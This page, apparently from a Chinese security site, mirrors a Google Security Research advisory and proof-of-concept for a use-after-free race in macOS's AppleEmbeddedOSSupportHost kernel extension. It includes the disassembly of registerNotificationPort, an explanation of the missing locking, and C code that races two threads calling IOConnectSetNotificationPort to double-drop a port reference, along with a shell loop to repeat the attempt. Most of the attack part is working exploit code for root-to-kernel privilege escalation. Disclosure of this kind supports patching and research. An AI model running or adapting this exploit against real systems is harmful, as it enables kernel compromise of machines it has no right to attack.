首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
macOS Kernel - Use-After-Free Due to Lack of Locking in 'AppleEmbeddedOSSupportH
来源:Google Security Research 作者:Google 发布时间:2018-02-11  
/*
AppleEmbeddedOSSupportHost.kext is presumably involved in the communication with the OS running on the touch bar on new MBP models.
 
Here's the userclient's registerNotificationPort method:
 
__text:0000000000002DE4 ; AppleEmbeddedOSSupportHostClient::registerNotificationPort(ipc_port *, unsigned int, unsigned int)
__text:0000000000002DE4                 push    rbp
__text:0000000000002DE5                 mov     rbp, rsp
__text:0000000000002DE8                 push    r14
__text:0000000000002DEA                 push    rbx
__text:0000000000002DEB                 mov     r14, rsi
__text:0000000000002DEE                 mov     rbx, rdi
__text:0000000000002DF1                 mov     rdi, [rbx+0E8h]
__text:0000000000002DF8                 test    rdi, rdi
__text:0000000000002DFB                 jz      short loc_2E0D
__text:0000000000002DFD                 call    __ZN12IOUserClient23releaseNotificationPortEP8ipc_port ; IOUserClient::releaseNotificationPort(ipc_port *)
__text:0000000000002E02                 mov     qword ptr [rbx+0E8h], 0
__text:0000000000002E0D
__text:0000000000002E0D loc_2E0D:                               ; CODE XREF: AppleEmbeddedOSSupportHostClient::registerNotificationPort(ipc_port *,uint,uint)+17j
__text:0000000000002E0D                 mov     [rbx+0E8h], r14
__text:0000000000002E14                 xor     eax, eax
__text:0000000000002E16                 pop     rbx
__text:0000000000002E17                 pop     r14
__text:0000000000002E19                 pop     rbp
__text:0000000000002E1A                 retn
 
The IOUserClient superclass doesn't implement any locking for this method; it's up to the user client itself to correctly prevent
dangerous concurrent accesses.
 
By calling registerNotificationPort in two threads in parallel we can cause a AppleEmbeddedOSSupportHostClient to drop two references on a port when
it only holds one.
 
Note that AppleEmbeddedOSSupportHostClient is only reachable by root so this is a root -> kernel priv esc.
 
Repro like this: while true; do ./embedded_host; done
 
Please test on a machine which has a touchbar!
 > kextstat | grep AppleEmbeddedOSSupport
should display something if it does.
*/
 
// ianbeer
#if 0
MacOS kernel uaf due to lack of locking in AppleEmbeddedOSSupportHostClient::registerNotificationPort
 
AppleEmbeddedOSSupportHost.kext is presumably involved in the communication with the OS running on the touch bar on new MBP models.
 
Here's the userclient's registerNotificationPort method:
 
__text:0000000000002DE4 ; AppleEmbeddedOSSupportHostClient::registerNotificationPort(ipc_port *, unsigned int, unsigned int)
__text:0000000000002DE4                 push    rbp
__text:0000000000002DE5                 mov     rbp, rsp
__text:0000000000002DE8                 push    r14
__text:0000000000002DEA                 push    rbx
__text:0000000000002DEB                 mov     r14, rsi
__text:0000000000002DEE                 mov     rbx, rdi
__text:0000000000002DF1                 mov     rdi, [rbx+0E8h]
__text:0000000000002DF8                 test    rdi, rdi
__text:0000000000002DFB                 jz      short loc_2E0D
__text:0000000000002DFD                 call    __ZN12IOUserClient23releaseNotificationPortEP8ipc_port ; IOUserClient::releaseNotificationPort(ipc_port *)
__text:0000000000002E02                 mov     qword ptr [rbx+0E8h], 0
__text:0000000000002E0D
__text:0000000000002E0D loc_2E0D:                               ; CODE XREF: AppleEmbeddedOSSupportHostClient::registerNotificationPort(ipc_port *,uint,uint)+17j
__text:0000000000002E0D                 mov     [rbx+0E8h], r14
__text:0000000000002E14                 xor     eax, eax
__text:0000000000002E16                 pop     rbx
__text:0000000000002E17                 pop     r14
__text:0000000000002E19                 pop     rbp
__text:0000000000002E1A                 retn
 
The IOUserClient superclass doesn't implement any locking for this method; it's up to the user client itself to correctly prevent
dangerous concurrent accesses.
 
By calling registerNotificationPort in two threads in parallel we can cause a AppleEmbeddedOSSupportHostClient to drop two references on a port when
it only holds one.
 
Note that AppleEmbeddedOSSupportHostClient is only reachable by root so this is a root -> kernel priv esc.
 
Repro like this: while true; do ./embedded_host; done
 
Please test on a machine which has a touchbar!
 > kextstat | grep AppleEmbeddedOSSupport
should display something if it does.
#endif
 
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
 
#include <mach/mach.h>
#include <mach/host_priv.h>
 
#include <IOKit/IOKitLib.h>
 
mach_port_t q() {
  mach_port_t p = MACH_PORT_NULL;
  mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &p);
  mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND);
  return p;
}
 
volatile int start = 0;
volatile mach_port_t conn;
 
void* racer(void* arg) {
  while(!start){;}
    IOConnectSetNotificationPort(conn, 0, MACH_PORT_NULL, 0);
  return NULL;
}
 
 
 
int main() {
    kern_return_t err;
  io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("AppleEmbeddedOSSupportHost"));
 
  if (service == IO_OBJECT_NULL){
    printf("unable to find service\n");
    return 0;
  }
 
  conn = MACH_PORT_NULL;
  err = IOServiceOpen(service, mach_task_self(), 0, &conn);
  if (err != KERN_SUCCESS){
    printf("unable to get user client connection\n");
    return 0;
  }
 
  mach_port_t p = q();
 
    IOConnectSetNotificationPort(conn, 0, p, 0);
 
  //mach_port_destroy(mach_task_self(), p);
  // kernel holds the only ref
 
 
  int n_threads = 2;
  pthread_t threads[n_threads];
  for(uint32_t i = 0; i < n_threads; i++) {
    pthread_create(&threads[i], NULL, racer, NULL);
  }
 
  start = 1;
 
  for(uint32_t i = 0; i < n_threads; i++) {
    pthread_join(threads[i], NULL);
    }
 
  return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·JBoss 4.2.x/4.3.x - Informatio
·Marked2 - Local File Disclosur
·HPE iLO 4 < 2.53 - Add New Adm
·HiSilicon DVR Devices - Remote
·Dahua Generation 2/3 - Backdoo
·Herospeed - 'TelnetSwitch' Rem
·Adobe Coldfusion 11.0.03.29286
·Asterisk 13.17.2 - 'chan_skinn
·MalwareFox AntiMalware 2.74.0.
·Cisco ASA - Crash PoC
·Geovision Inc. IP Camera & Vid
·Geovision Inc. IP Camera/Video
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved